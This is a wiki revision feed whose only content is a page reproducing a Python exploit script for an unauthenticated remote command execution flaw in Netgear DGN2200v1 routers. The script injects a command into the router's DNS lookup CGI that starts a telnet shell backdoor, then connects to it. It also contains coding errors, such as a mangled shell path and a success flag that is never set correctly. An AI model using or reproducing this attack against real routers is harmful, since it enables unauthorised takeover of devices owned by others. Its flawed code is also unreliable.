https://pwnwiki.com/index.php?action=history&feed=atom&title=Netgear_DGN2200v1_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Netgear DGN2200v1 遠程命令執行漏洞 - Revision history
2026-04-13T13:28:45Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Netgear_DGN2200v1_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=6426&oldid=prev
Pwnwiki: Created page with "<pre> # Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) # Date: 02.07.2021 # Exploit Author: SivertPL # Vendor Homepage: https://www.netgea..."
2021-07-07T02:48:57Z
<p>Created page with "<pre> # Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) # Date: 02.07.2021 # Exploit Author: SivertPL # Vendor Homepage: https://www.netgea..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)<br />
# Date: 02.07.2021<br />
# Exploit Author: SivertPL<br />
# Vendor Homepage: https://www.netgear.com/<br />
# Version: All prior to v1.0.0.60<br />
<br />
#!/usr/bin/python<br />
<br />
"""<br />
NETGEAR DGN2200v1 Unauthenticated Remote Command Execution<br />
<br />
Author: SivertPL (kroppoloe@protonmail.ch)<br />
Date: 02.07.2021<br />
Status: Patched in some models<br />
Version: All prior to v1.0.0.60<br />
Impact: Critical <br />
<br />
CVE: No CVE number assigned<br />
PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365<br />
<br />
<br />
References: <br />
1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/<br />
2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1<br />
<br />
<br />
The exploit script only works on UNIX-based systems.<br />
<br />
This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past.<br />
This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol.<br />
<br />
"""<br />
<br />
import sys<br />
import requests<br />
import os<br />
<br />
target_ip = "192.168.0.1"<br />
telnet_port = 666<br />
sent = False<br />
<br />
def main():<br />
if len(sys.argv) < 3:<br />
print "./dgn2200_pwn.py <router ip> <backdoor-port>"<br />
exit()<br />
<br />
target_ip = sys.argv[1]<br />
telnet_port = int(sys.argv[2])<br />
print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..."<br />
send_payload()<br />
print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..."<br />
print "[!] If it fails to connect it means the target is probably not vulnerable"<br />
spawn_shell()<br />
<br />
def send_payload():<br />
try:<br />
requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true")<br />
sent = True<br />
except Exception:<br />
sent = False<br />
print "[-] Unknown error, target might not be vulnerable."<br />
<br />
def spawn_shell():<br />
if sent:<br />
print "[+] Dropping a shell..."<br />
os.system("telnet " + target_ip + " " + telnet_port)<br />
else:<br />
exit()<br />
<br />
<br />
if __name__ == "__main__":<br />
main()<br />
</pre></div>
Pwnwiki